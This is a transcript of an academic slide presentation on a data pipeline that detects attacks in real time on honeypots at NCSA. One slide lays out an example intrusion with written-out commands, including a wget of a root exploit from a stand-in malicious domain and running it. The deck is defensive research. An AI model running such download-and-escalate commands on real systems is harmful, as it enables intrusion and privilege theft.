scalable data analytics pipeline for real time attack
play

Scalable Data Analytics Pipeline for Real-Time Attack Detection; - PowerPoint PPT Presentation

May 19, 2023 •191 likes •508 views

Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment Eric Badger Masters Student Computer Engineering 1 Overview Introduction/Motivation Challenges

  1. Scalable Data Analytics Pipeline for Real-Time Attack Detection; Design, Validation, and Deployment in a Honeypot Environment Eric Badger Master’s Student Computer Engineering 1

  2. Overview ▪ Introduction/Motivation ▪ Challenges ▪ Pipeline Design ▪ Pipeline Deployment ▪ Validation of Alerts and Attack Detection Tools ▪ Future Work ▪ Conclusion 2

  3. Research Problem Our goal is to detect potential attacks as early as possible. Security analysts attempt to detect and prevent attacks, but they can’t analyze everything in their infrastructure by hand. They need tools to automate the analysis for early detection of attacks. ▪ How do we transition attack detection models from theory to practice? ▪ How do we validate that the alerts we are using are useful? Does combining alerts from different monitors make the attack detection better? Is the extra performance overhead worth it? ▪ How do we validate that our attack detection model is adequate and better than others? What models are suitable for real-time attack detection in practical deployment? 3

  4. Research Challenges: Transitioning Attack Detection from Theory to Practice ▪ Identifying which alerts are useful for attack detection ▪ Normalizing all logs to a common format ▪ Achieving both high-accuracy and real-time attack detection ▪ Achieving high-accuracy attack detection in the face of alert randomness, noise, and imperfect monitors ▪ Scaling the data pipeline The chain of tools used for data-driven attack detection 4

  5. Example Attack Scenario 4. Escalate privilege $ gcc vm.c -o a; ./a Linux vmsplice Local Root Exploit [+] mmap: 0xAABBCCDD [+] page: 0xDDEEFFGG Legitimate Users … 2. OS fingerprinting # whoami root $ uname -a; w alice : password123 3. Download exploit bob : password456 Linux 2.6.xx, up 1:17, 1 user … $ wget server6.bad-domain.com/vm.c USER TTY LOGIN@ IDLE Social engineering Connecting to xx.yy.zz.tt:80… connected. xxx console 18:40 1:16 HTTP 1.1 GET /vm.c 200 OK Email phishing Password guessing Firewall Target OpenSSH System 5. Replace SSH daemon alice : password123 bob : password456 sshd: Received SIGHUP; restarting. … Attacker 1. Login remotely Bro IDS Syslog File Integrity Monitor sshd: Accepted <user> from <remote> 5

  6. How to Extract Important Alerts ▪ Network Monitors Bro Network IDS used for packet analysis CriticalStack Intel Feed ▪ Host Monitors OSSEC Runs periodic system checks and file integrity monitoring Aggregates and correlates all other host alerts Snoopy Logger Logs all execv system calls RKHunter Searches for rootkits, hidden folders/files/ports, and other system issues Syslogs Normal GNU/Linux “/var/log” logs, such as auth.log, kern.log, dpkg.log, and others Bash Logs Logs Bash history as the commands are executed 6

  7. Log Normalization and Aggregation OSSEC Logs Auth Logs ISO 8601 Epoch Time RKHunter Logs Bro Notice Logs Snoopy Logs 7

  8. Log Normalization and Aggregation (2) ▪ Since the logs are all in different formats, they need to be normalized to a Normalized Log common format All logs needed to be centralized so that we can act on them TLS/SSL encryption is necessary to secure the movement of logs through the pipeline If not, the logs could be added, deleted, or changed by a MITM attack 8

  9. Pipeline Design ● The Data Source can be any sort of online or offline computer or device Example ○ Online Honeypots Tools ■ Honeypots, servers, workstations, phones ○ Offline ■ Security testbed, old logs ● We use customized honeypots deployed at the NCSA Generic Data Source Tools 9

  10. Pipeline Design Bro ● The Monitors take in data and create alerts Network Example ● The data can be logs, network traffic, or anything Traffic/Raw Honeypots Tools Logs that can be alerted on ● We use Bro, OSSEC, Snoopy Logger, RKHunter, Syslogs, and Bash logs Generic Data Source Monitors Tools 10

  11. Pipeline Design ● The Log Aggregation and Normalization Bro takes in alerts from multiple different inputs and normalizes them to a Network Example Alerts common format Traffic/Raw Honeypots Tools Logs ● We use Logstash as the Log Aggregation tool ● We use Logstash filters to do the Log Normalization ● Logstash has integration with many other tools and has a large community Generic Log Aggregation and Data Source Monitors base Tools Normalization 11

  12. Pipeline Design Bro ● The Message Queue deals with fluctuations in Network Example Alerts Traffic/Raw Honeypots the throughput of alerts Tools Logs ● This prevents alert loss ● We use Kafka, because it is horizontally scalable and high-throughput Generic Log Aggregation and Message Data Source Monitors Tools Normalization Queue 12

  13. Pipeline Design ● The Attack Detection tool takes in alerts from the Message Queue and does analysis to detect attacks ● We use AttackTagger, which is an attack detection Bro tool based on factor graphs Network Example Alerts Traffic/Raw Honeypots Tools Logs AttackTagger Generic Log Aggregation and Message Data Source Monitors Attack Tools Normalization Queue Detection 13

  14. Pipeline Design Bro Network Example Alerts Traffic/Raw Honeypots Tools Logs ● The Log Storage tool is used to store logs for post- AttackTagger mortem analysis ● We chose Elasticsearch because it integrates easily with Logstash and also because of its low indexing times Generic Log Aggregation and Message Data Source Monitors Log Storage Attack Tools Normalization Queue Detection 14

  15. Pipeline Design Bro Network Example Alerts Traffic/Raw Honeypots Tools Logs ● The Data Visualization tool allows System Administrators AttackTagger to see large amounts of data in a concise space ● We chose Kibana because it has comprehensive visualization and also integrates well with Elasticsearch Generic Log Aggregation and Message Data Data Source Monitors Log Storage Attack Tools Normalization Queue Visualization Detection 15

  16. 16

  17. Pipeline Design Bro Network Example Alerts Traffic/Raw Honeypots Tools Logs AttackTagger Generic Log Aggregation and Message Data Data Source Monitors Log Storage Attack Tools Normalization Queue Visualization Detection 17

  18. How Do I Know What Alerts Are Important? ▪ Research was done in [1] and [2] that studied attacks over a six-year period at NCSA. This research identified important alerts related to these attacks and developed the AttackTagger detection tool ▪ We utilized and extended a custom set of monitors to create alerts corresponding to the inputs that were used in AttackTagger ▪ In essence, we brought AttackTagger from a theoretical tool to actual deployment [ 1] Phuong Cao, Key-whan Chung, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam J. Slagell. 2014. Preemptive intrusion detection. HotSoS '14. [ 2] Phuong Cao, Eric Badger, Zbigniew Kalbarczyk, Ravishankar Iyer, and Adam Slagell. 2015. Preemptive intrusion detection: theoretical framework and real- world measurements. HotSoS '15. 18

  19. What Can We Do with This Pipeline? ▪ Both online and offline deployment ▪ Online Analysis of attacks happening on the infrastructure Analysis of attack detection tools on live data ▪ Offline Post-mortem log analysis (via Elasticsearch/Kibana) Analysis of old attacks Development of attack detection tools Validation of alerts 19

  20. Public Network Honeypots at NCSA ▪ NCSA server running several VMs Monitoring Honeypot VMs Honeypot VM Open to public VMs Monitoring VM Allows TCP Port 5000 (Logstash) from honeypots Allows TCP Port 22 from NCSA, UI, and UI wireless Private Sends logs to Collector via Private Network Network ▪ Collector Allows TCP Port 5001 (Logstash) from private network Allows TCP Port 22 from NCSA, UI, and UI wireless External Collector 20

  21. Honeypots at NCSA (2) 21

  22. Preliminary Honeypot Results ▪ 3 separate SSH bruteforce attacks successfully compromised one of the honeypots in the first 3 days ▪ Appeared to download and execute either an open proxy or a DDoS attack through the program “/tmp/squid64” ▪ They beat my monitors! (Well, sort of...) They pushed their malware from the anomalous host instead of pulling it from the honeypot They deleted the malware immediately after running it, so it was not seen by OSSEC’s file-integrity monitoring 22

  23. How to Validate Importance of Inputs (Alerts) ▪ Mix and match which monitors/alerts that we use in our attack detection ▪ Evaluate the difference in attack detection coverage and accuracy Adding monitors/alerts will likely add detection coverage because of extra data Adding monitors/alerts could possibly decrease detection accuracy because of additional noise ▪ Determine whether the difference in detection coverage is worth the additional overhead 23

  24. How to Validate Accuracy of Outputs (Detection Tools) ▪ Compare and contrast different attack detection tools e.g. Factor Graphs, Bayesian Networks, Markov Random Fields, Signature Detection, etc. Which are most accurate? Which are least complex? ▪ In the pipeline, attack detection tools are plug and play as long as they can read the normalized alert format If they can’t, a translation filter can be added 24

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong

Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong

Scalable Data Analytics Pipeline for Validation of Real-Time Attack Detection Eric Badger , Phuong Cao, Alex Withers, Adam Slagell, Zbigniew Kalbarczyk, Ravi Iyer University of Illinois Urbana-Champaign 1 Overview Introduction/Motivation

283 views • 24 slides
Building Scalable Real-Time Data Pipeline Data Fridge Vicente Valls Rios Software

Building Scalable Real-Time Data Pipeline Data Fridge Vicente Valls Rios Software

Building Scalable Real-Time Data Pipeline Data Fridge Vicente Valls Rios Software Engineering Manager !!! 2 million orders delivered in one day (July 2019) www.deliveryhero.com Data Volume in Numbers + User clicks + Logistics data

283 views • 27 slides
Highly Scalable Real-Time Analytics with CloudDBAppliance Boyan Kolev, Oleksandra Levchenko,

Highly Scalable Real-Time Analytics with CloudDBAppliance Boyan Kolev, Oleksandra Levchenko,

Highly Scalable Real-Time Analytics with CloudDBAppliance Boyan Kolev, Oleksandra Levchenko, Florent Masseglia, Reza Akbarina, Esther Pacitti, Patrick Valduriez (INRIA, France) Work partially funded by the EUs Horizon 2020 programme, grant

334 views • 7 slides
Real-Time in the Real World: Building a State of the Art Real-Time Analytics Platform INFORMS

Real-Time in the Real World: Building a State of the Art Real-Time Analytics Platform INFORMS

Real-Time in the Real World: Building a State of the Art Real-Time Analytics Platform INFORMS Analytics Conference April 14 th , 2015 Joe DeCosmo Chief Analytics Officer Enova International We are a growing global online Lender Founded

229 views • 18 slides
Deep Learning Frameworks with Spark and GPUs Abstract Spark is a powerful, scalable, real-time

Deep Learning Frameworks with Spark and GPUs Abstract Spark is a powerful, scalable, real-time

Deep Learning Frameworks with Spark and GPUs Abstract Spark is a powerful, scalable, real-time data analytics engine that is fast becoming the de facto hub for data science and big data. However, in parallel, GPU clusters is fast becoming the

389 views • 26 slides
System for Supporting Real-time Analytics Feng Li, M. Tamer Ozsu, Gang Chen, Beng Chin Ooi

System for Supporting Real-time Analytics Feng Li, M. Tamer Ozsu, Gang Chen, Beng Chin Ooi

R-Store: A Scalable Distributed System for Supporting Real-time Analytics Feng Li, M. Tamer Ozsu, Gang Chen, Beng Chin Ooi National University of Singapore ICDE 2014 Background Situation for large scale data processing Systems

901 views • 20 slides
Fully Fault Tolerant Real Time Data Pipeline with Docker and Mesos Rahul Kumar Technical Lead

Fully Fault Tolerant Real Time Data Pipeline with Docker and Mesos Rahul Kumar Technical Lead

Fully Fault Tolerant Real Time Data Pipeline with Docker and Mesos Rahul Kumar Technical Lead LinuxCon / ContainerCon - Berlin, Germany Data Pipeline Agenda Mesos + Docker Reactive Data Pipeline Goal Analyzing data always

504 views • 37 slides
Real Time Data Analytics @ Uber Ankur Bansal November 14, 2016 About Me Sr. Software Engineer,

Real Time Data Analytics @ Uber Ankur Bansal November 14, 2016 About Me Sr. Software Engineer,

Real Time Data Analytics @ Uber Ankur Bansal November 14, 2016 About Me Sr. Software Engineer, Streaming Team @ Uber Streaming team supports platform for real time data analytics: Kafka, Samza, Flink, Pinot.. and plenty more

1.91k views • 71 slides
GO BEYOND DATA Real-time Analytics for Application Performance Management Yury Oleynik Data

GO BEYOND DATA Real-time Analytics for Application Performance Management Yury Oleynik Data

GO BEYOND DATA Real-time Analytics for Application Performance Management Yury Oleynik Data Analyst Modern applications Agenda Monitoring challenges INSTANA apploach 2 Instana, Inc. Proprietary and Confidential Business Demand: Write and

351 views • 20 slides
Agenda 1. Capital One 2. Traditional Batch Analytics 3. The Great Paradigm Shift Real-Time

Agenda 1. Capital One 2. Traditional Batch Analytics 3. The Great Paradigm Shift Real-Time

Agenda 1. Capital One 2. Traditional Batch Analytics 3. The Great Paradigm Shift Real-Time Analytics 4. What are the Drivers? 5. Apache Flink Next Generation Big Data Analytics Framework 6. Business Use Case: Customer Activity Event Logs 7.

1.05k views • 47 slides
Real time Predictive Fraud Analytics using Databricks &amp; Tableau Prasad Kona Partner Solution

Real time Predictive Fraud Analytics using Databricks &amp; Tableau Prasad Kona Partner Solution

Real time Predictive Fraud Analytics using Databricks &amp; Tableau Prasad Kona Partner Solution Architect Predictive Fraud Analytics Payments Network Card Transaction Data Database Product Data Location Data RAW DATA LAKE Accounts

387 views • 10 slides
Query Optimization Time: The New Bottleneck in Real-time Data Analytics IMDM 2015 Rajkumar Sen,

Query Optimization Time: The New Bottleneck in Real-time Data Analytics IMDM 2015 Rajkumar Sen,

Query Optimization Time: The New Bottleneck in Real-time Data Analytics IMDM 2015 Rajkumar Sen, Jack Chen, Nika Jimsheleishvilli Problem Statement 2 In-memory distributed databases everywhere.. What do we expect from in-memory today?

289 views • 24 slides
Data-Intensive Distributed Computing CS 451/651 (Fall 2018) Part 9: Real-Time Data Analytics (1/2)

Data-Intensive Distributed Computing CS 451/651 (Fall 2018) Part 9: Real-Time Data Analytics (1/2)

Data-Intensive Distributed Computing CS 451/651 (Fall 2018) Part 9: Real-Time Data Analytics (1/2) November 22, 2018 Jimmy Lin David R. Cheriton School of Computer Science University of Waterloo These slides are available at

648 views • 64 slides
HOW TO ACHIEVE REAL-TIME ANALYTICS ON A DATA LAKE USING GPUS Mark Brooks - Principal System

HOW TO ACHIEVE REAL-TIME ANALYTICS ON A DATA LAKE USING GPUS Mark Brooks - Principal System

HOW TO ACHIEVE REAL-TIME ANALYTICS ON A DATA LAKE USING GPUS Mark Brooks - Principal System Engineer @ Kinetica May 09, 2017 The Challenge: How to maintain analytic performance while dealing with: Larger data volumes Streaming data

429 views • 30 slides
DSC 102 Systems for Scalable Analytics Arun Kumar Topic 3: Parallel and Scalable Data

DSC 102 Systems for Scalable Analytics Arun Kumar Topic 3: Parallel and Scalable Data

DSC 102 Systems for Scalable Analytics Arun Kumar Topic 3: Parallel and Scalable Data Processing Ch. 9.4, 12.2, 14.1.1, 14.6, 22.1-22.3, 22.4.1, 22.8 of Cow Book Ch. 5, 6.1, 6.3, 6.4 of MLSys Book 1 Q: Why bother with large-scale data?

1.66k views • 124 slides
DSC 102 Systems for Scalable Analytics Arun Kumar Topic 4: ML Data Preparation and Model

DSC 102 Systems for Scalable Analytics Arun Kumar Topic 4: ML Data Preparation and Model

DSC 102 Systems for Scalable Analytics Arun Kumar Topic 4: ML Data Preparation and Model Selection Chapter 8, 8.1, 8.2, 8.3, 8.4 of MLSys Book 1 DSC 102 will get you thinking about the fundamentals of scalable analytics systems 1.

789 views • 62 slides
PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub

PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub

PhiGARo: Automatic Phishing Detection and Incident Response Framework Martin Husk, Jakub egan {husakm|cegan}@ics.muni.cz ECTCM 2014 Fribourg, Switzerland Outline Introduction, Phishing incident response, PhiGARo (phishing

270 views • 23 slides
Leadership for Change Programme Residential 1 Tuesday 23 rd Wednesday 24 th June 2015

Leadership for Change Programme Residential 1 Tuesday 23 rd Wednesday 24 th June 2015

Leadership for Change Programme Residential 1 Tuesday 23 rd Wednesday 24 th June 2015 Welcome! Purpose of the programme To develop systems leadership skills and capacity amongst public leaders To support public leaders to make

983 views • 94 slides
Predicate Logic: Introduction and Translations Alice Gao Lecture 10 CS 245 Logic and

Predicate Logic: Introduction and Translations Alice Gao Lecture 10 CS 245 Logic and

Predicate Logic: Introduction and Translations Alice Gao Lecture 10 CS 245 Logic and Computation Fall 2019 1 / 28 Outline Learning goals Introduction and Motivation Elements of Predicate Logic Translating between English and Predicate

317 views • 29 slides
20 Billion IoT Devices In 2023 page 02 * Gemalto The State of IoT Security guidelines 79

20 Billion IoT Devices In 2023 page 02 * Gemalto The State of IoT Security guidelines 79

20 Billion IoT Devices In 2023 page 02 * Gemalto The State of IoT Security guidelines 79 % required breach 48 % exists? improve 62 % security page 03 * Gemalto The State of IoT Security Honeypot A honeypot is a computer

631 views • 25 slides
Deterring Cheating in Online Environments Henry Corrigan-Gibbs Nakull Gupta Curtis

Deterring Cheating in Online Environments Henry Corrigan-Gibbs Nakull Gupta Curtis

Deterring Cheating in Online Environments Henry Corrigan-Gibbs Nakull Gupta Curtis Northcutt Stanford University Microsoft Research India MIT Edward Cutrell William Thies Microsoft Research India Microsoft

1.19k views • 101 slides
Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha

Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha

Honeypots Mathias Gibbens Harsha vardhan Rajendran April 22, 2012 Mathias Gibbens, Harsha vardhan Rajendran () Honeypots April 22, 2012 1 / 28 Outline Introduction 1 History 2 Types of honeypots 3 Deception techniques using Honeypots

632 views • 61 slides
Digital Democracy: First Task Hi-Fi Prototype Sharewaves Garrick F. | Gen S. | Grace W.

Digital Democracy: First Task Hi-Fi Prototype Sharewaves Garrick F. | Gen S. | Grace W.

Digital Democracy: First Task Hi-Fi Prototype Sharewaves Garrick F. | Gen S. | Grace W. Garrick Gen Grace Coterm, CompSci Senior, Econ Senior, SymSys ran out of facts loves filet-o-fish flamed for liking honeydew Our mission is to help

664 views • 19 slides
Agenda General Announcements Module 3 &amp; 4 Feedback Module 5 Objectives and

Agenda General Announcements Module 3 &amp; 4 Feedback Module 5 Objectives and

LiveWell Kids Nutrition Module 5 Training 1 st Grade Agenda General Announcements Module 3 &amp; 4 Feedback Module 5 Objectives and Nutrition Education Mindful Food Tasting Lesson Delivery Q &amp; A General

438 views • 21 slides

More recommend